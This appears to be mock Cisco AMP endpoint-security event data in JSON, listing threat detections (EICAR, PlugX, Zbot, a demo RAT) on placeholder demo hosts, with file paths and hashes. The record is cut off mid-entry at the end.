-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055239416513000,"timestamp":1610705023,"timestamp_nanoseconds":72000000,"date":"2021-01-15T10:03:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055239416512517","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055222236643000,"timestamp":1610705019,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:03:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055222236643332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1uc","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s1uc","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055217941676000,"timestamp":1610705018,"timestamp_nanoseconds":243000000,"date":"2021-01-15T10:03:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055217941676035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255468063687000,"timestamp":1610705016,"timestamp_nanoseconds":920000000,"date":"2021-01-15T10:03:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255468063686673","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255420819046000,"timestamp":1610705005,"timestamp_nanoseconds":829000000,"date":"2021-01-15T10:03:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255420819046416","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395959000600,"timestamp":1610704997,"timestamp_nanoseconds":959000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"Win32.DemoMal.Rat.Client","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704997,"start_date":"2021-01-15T10:03:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900"},"parent":{"disposition":"Malicious","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055127747363000,"timestamp":1610704997,"timestamp_nanoseconds":930000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055127747362818","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055127747363000,"timestamp":1610704997,"timestamp_nanoseconds":930000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055127747362817","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906501425758000,"timestamp":1610704994,"timestamp_nanoseconds":771000000,"date":"2021-01-15T10:03:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906501425758211","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\VirusMap\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":3168,"disposition":"Clean","file_name":"mcvsmap.exe","identity":{"sha256":"ae16e10e621d6610a3f7f2c7122f9d1263700ba02d1b90e42798decb2fe84096","sha1":"9224de3af2a246011c6294f64f27206d165317ba","md5":"4e1e0b8b0673937415599bf2f24c44ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255369279439000,"timestamp":1610704993,"timestamp_nanoseconds":270000000,"date":"2021-01-15T10:03:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255369279438863","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906497130791000,"timestamp":1610704993,"timestamp_nanoseconds":662000000,"date":"2021-01-15T10:03:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906497130790914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Local Settings\\Temp\\RarSFX0\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":428,"disposition":"Malicious","file_name":"ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395608001000,"timestamp":1610704992,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:03:12+00:00","event_type":"Adobe Reader compromise","event_type_id":1107296261,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704992,"start_date":"2021-01-15T10:03:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a"},"parent":{"disposition":"Clean","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266559459951000,"timestamp":1610704979,"timestamp_nanoseconds":950000000,"date":"2021-01-15T10:02:59+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5832266559459950593","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":25939,"local_ip":"10.10.0.0","local_port":15322,"nfm":{"direction":"Outgoing connection from","protocol":"UDP"},"parent":{"process_id":1512,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":701000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408458","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":497000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408457","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":451000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408456","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266495035441000,"timestamp":1610704964,"timestamp_nanoseconds":482000000,"date":"2021-01-15T10:02:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266495035441159","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":607000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":544000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":404000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":201000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat 